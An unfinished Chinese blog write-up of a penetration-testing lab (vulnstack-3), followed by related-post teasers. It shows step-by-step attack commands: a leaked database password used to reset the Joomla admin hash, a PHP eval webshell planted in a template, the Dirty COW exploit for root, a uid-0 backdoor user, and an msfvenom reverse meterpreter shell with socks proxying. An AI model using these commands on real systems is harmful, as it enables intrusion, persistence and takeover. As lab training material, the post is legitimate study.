vulnstack-3(为完成,代理出错)

于 2024-08-07 09:26:11 发布
阅读量887 收藏 14
点赞数 34
文章标签: vulnstack 网络安全 环境搭建 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140974498
版权

环境搭建

        这次的环境为黑盒测试,不提供账号密码。目标为拿下域控 flag。

全部虚拟机挂起状态

两台linux开启即可

网络搭建

新建一个网段

攻击机与Centos处于公网(桥接),其余机器与Centos处于同一内网

用Centos去ping其他内网机器查看是否网络畅通

Centos

还有一个net模式

其他

Ping查看连接是否通顺

启动配置

        service network restart 重启网络服务(web-centos)

Ifconfig eth0

查看桥接后的网段

192.168.16.103

扫描IP 与 端口

 D:\桌面\fscan-main\fscan-main\fscan.exe -h 192.168.16.0/24

扫描目录

        a)dirsearch -u http://192.168.16.103 -x 403                          // 指定扫描并排除403状态码

                信息:administrator —> 登录数据后台                    README.txt —> 开发文件

                           configuration.php~ —> 数据配置文件           robots.txt —> 目录索引

                           web.config.txt —> 配置文件

  configuration.php 文件通常是与网站相关的配置文件,特别是在使用PHP语言开发的网站中。这个文件通常包含了网站的数据库连接信息、安全密钥、路径设置以及其他重要的配置信息。这个文件的安全性非常重要,因为其中可能包含对网站的敏感信息。在任何情况下,都应该确保这个文件不会被未经授权的访问者获取。

数据分析

        a)访问 view-source:http://192.168.16.103/configuration.php~ 文件的源代码

                数据库账号/密码:testuser / cvcvgjASD!@,并且含有 文件路径

漏洞利用

        根据收集来的信息,突破口为登录数据库 修改后台密码 或者 添加后门用户去登录后台,再利用webshell来连接进行信息收集并提权。

 我们可以利用 Navicat Premium 连接数据库,该工具为图形化页面方便操作。我们的目标为修改数据库 administrator 的密码。

        注:Joomla 后台密码为:md5 加密;e10adc3949ba59abbe56e057f20f883e(123456)

                路径:joomla -> 表 ->am2zu_users -> password -> 保存

update  am2zu_users set `password`='e10adc3949ba59abbe56e057f20f883e' where id=891

外网渗透

数据后台

        连接数据库是我们发现它是有Joomla的开源CMS来搭建的网站,我们登录后台之后有利用Joomla远程命令执行来连接webshell(蚁剑)。

木马注入

        访问 http://192.168.16.103/administrator/ 登录后台,账号/密码:administrator / 123456

注入路径:extensions -> templates -> templates -> beez3 -> index.php

        木马代码:eval($_POST[123]);?>

写入木马后保存

接着哥斯拉连接

配置参数:URL -> http://192.168.16.103/templates/beez3/index.php                         

密码:123

内网信息收集

用户信息

        我们发现这里含有一个后门用户,并且外网服务器开启了22端口,可以尝试利用 ssh 来远程控制。

/tmp/mysql/test.txt         // 临时文件夹下含有一个后门用户

账号/密码:wwwuser/wwwuser_123Aqx

利用22端口ssh登录连接

连接成功

我们成功登录但发现权限不足,查询内核版本来进行内核提权。

脏牛提权

        "脏牛"(Dirty COW)是一个Linux系统中的漏洞,它允许攻击者通过提升特权来获取对系统的未经授权访问。脚本:dirty.c

        适应范围:Linux内核 >= 2.6.22

信息

  1. uname -a      

// 网络接口信息

查询网络信息,我们发现了 93 的IP地址就是 内网IP。

上传脏牛

脏牛漏洞 (CVE-2016-5195)对CentOS 进行提权

EXP下载:https://github.com/FireFart/dirtycow

将代码上传到一个可以执行的文件夹内,可以尝试我的方法:

# Xshell连接后——>开启ftp服务——>脏牛传入tmp中——>xshell输入命令

xshell命令:到可执行文件cd /tmp

编译脏牛:gcc -pthread dirty.c -o dirty -lcrypt

rm -r passwd.bak    

chmod +x dirty.c

chmod +x dirty

给编译文件设密码:./dirty 123456         

id 显示用户的ID,以及所属群组的ID;uid=0,为root用户

给系统添加了一个管理员用户:用户名:firefart   密码:123456

useradd -p `openssl passwd -1 -salt 'salt' 123456` admin -o -u 0 -g root -G root -s /bin/bash -d /home/mysqld                              

// 留个后门用户

fscan 内网信息收集

        这边我们打进了外网服务器,这里我们利用 fscan 扫描工具来进行信息收集。

./fscan -h 192.168.93.0/24      // 全局扫描

总结一下

        1. 100和120这两个为服务器的IP地址,因为他们开启了80、3306端口。

        2. 10、20、30为域内IP地址,10 为 域控也是我们此行的目标,其余的就是域成员。

        3. 域内IP地址均含有 445 端口,可以尝试利用 ms17-010(永恒之蓝)漏洞。

环境原因用靶场扫描

MSF上线

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.16.104 LPORT=1234 -f elf > shell.elf

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 1234

exploit

上线

查看路由

run get_local_subnets

添加路由

run autoroute -s 192.168.93.0/24

run autoroute -p

挂起

background

smb内网探测

use auxiliary/scanner/smb/smb_version

options

set rhosts 192.168.93.0/24

exploit

设置代理

use auxiliary/server/socks_proxy

set VERSION 5

set SRVHOST 0.0.0.0(攻击机)

exploit

vim /etc/proxychains4.conf

横向渗透

未完成,代理老是失败,cao

小春学渗透
关注
  • 34
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红日安全靶场3
weixin_48169878的博客
07-13 4295
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
ATT&CK红队评估(红日靶场三)
weixin_45682839的博客
04-25 3504
ATT&CK红队评估(红日靶场三)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
渗透测试-红日靶场三
最新发布
konglong12311的博客
05-24 935
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日三打靶!!!
woshicainiao666的博客
02-02 933
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
VulnStack-ATT&CK-3(红日靶场三)
热门推荐
buffedon的博客
07-12 1万+
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内网渗透内网信息收集脏牛漏洞提权内网渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位域管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻域控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张网卡(仅主
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
vulnstack-ATT&CK实战系列 红队实战(一)
qq_41755084的博客
02-21 457
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019漏洞详情 (qiyuanxuetang.net)
vulnstack1--红队靶机(域渗透)
tlovejr的博客
04-27 4099
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
靶场vulnstack4的搭建
weixin_71169068的博客
11-17 735
搭建靶场vulnstack4
vulnstack4渗透-内网篇
weixin_51441054的博客
05-02 705
chisel+msf攻入内网 在kali上下载chisel再上传到Ubuntu上 目标服务器开启服务端 ./chisel_1.7.6_linux_amd64 server -p 2333 --socks5 攻击机kali开启客户端 ./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks 攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。 永.
红日三靶场
weixin_62915924的博客
05-04 1156
5.用蚁剑连接一下发现了命令执行不了用插件绕过,发现插件绕过只能Linux用,把蚁剑装到kali里面去,在连接一下发现可以用,点一下php7_GC_uaf php7_backtrace_uaf 发现得点两个才可以用可以成功命令执行但是是在192.168.93.120中。dirsearch -u http://192.168.0.104/ -e* 都可以扫描网站发现了/administrator进去查看一下,发现了joomla-cms网站。
红日ATT&CK VulnStack靶场(三)
xhscxj的博客
08-14 472
1.扫描DMZ机器端口2.进行ssh和3306爆破无果后访问web服务3.已知目标是Joomla,扫描目录4.有用的目录分别为1.php5.configuration.php~中泄露了数据库密码6.administrator为后台登录地址7.直接连接mysql8.找到管理员表,密码加密了9.百度joomla密码的加密方式以及重置方式,用下面的方式添加新的管理员用户10.重置密码后登录后台11.搜索相关漏洞,用这个后台RCE12.访问后并没有回显。
红日安全 ATT&CK VulnStack靶场(三)
baynk的博客
07-12 2981
0x00 前言 内网真的有点难搞,总是会碰到一些奇怪的问题。。。基础不难,地动山摇。 不知道原版哪下的,就放个自己云盘的,这玩意压缩后只有20G,解压后有100G… 放个下载地址:提取码: uecu 拓扑图如下 除了centos的出口网卡的IP是需要调整外,其余网卡都不需要调整。 0x01 Web打点 直接访问网站 发现很熟悉,joomla cms,国外比较有名的cms,直接上工具,kali里面带的joomscan [+] FireWall Detector [++] Firewall not det
红日安全红队靶场(三)一次简单的内网渗透
白帽技术与网络安全
07-24 5836
1、靶场介绍及设置这是红日团队的第三套靶场(靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成,其...
ATT&CK 红日靶场(三)-简记
zhoufy的博客
06-21 1033
端口目录访问 ip/1.php -->根目录、禁用函数!!!-------IP/configuration.php~-->>发现 testuser / cvcvgjASD!更改密码->>123456Step 》写马->>eval($_POST['123']);-》访问error.php--antsward 连接后无法执行命令:antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF。
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场
qq_47289634的博客
08-01 1618
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机网络配置,添加新的网络,该网络作为内部网络。注:名称及网段必须符合下面图片,进行了固定ip配置。
红日靶场第三关
红队是青春
11-18 5768
红日靶场第三关 一、环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机网络配置,添加新的网络,该网络作为内部网络。 注:名称及网段必须符合上述图片,进行了固定ip配置。 本次环境为黑盒测试,不提供虚拟机账号密码。 win10/kali:VMnet11 攻击机 web-centos:VMnet10、VMnet11 外网 w
红日3靶场-wp
shajianlong666的博客
06-04 499
内网渗透之-红日靶场3(传说可让你对内网渗透大彻大悟)
[红日靶机渗透] ATK&CK红队评估实战靶场三
人若无名,便可专心练剑
02-08 1213
ATK&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一个用于描述和分类针对计算机系统的攻击行为的知识库。红队评估是指模拟真实攻击者行为的一种安全评估方法,通过模拟攻击思路、技术和方法来评估目标系统的安全性。
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值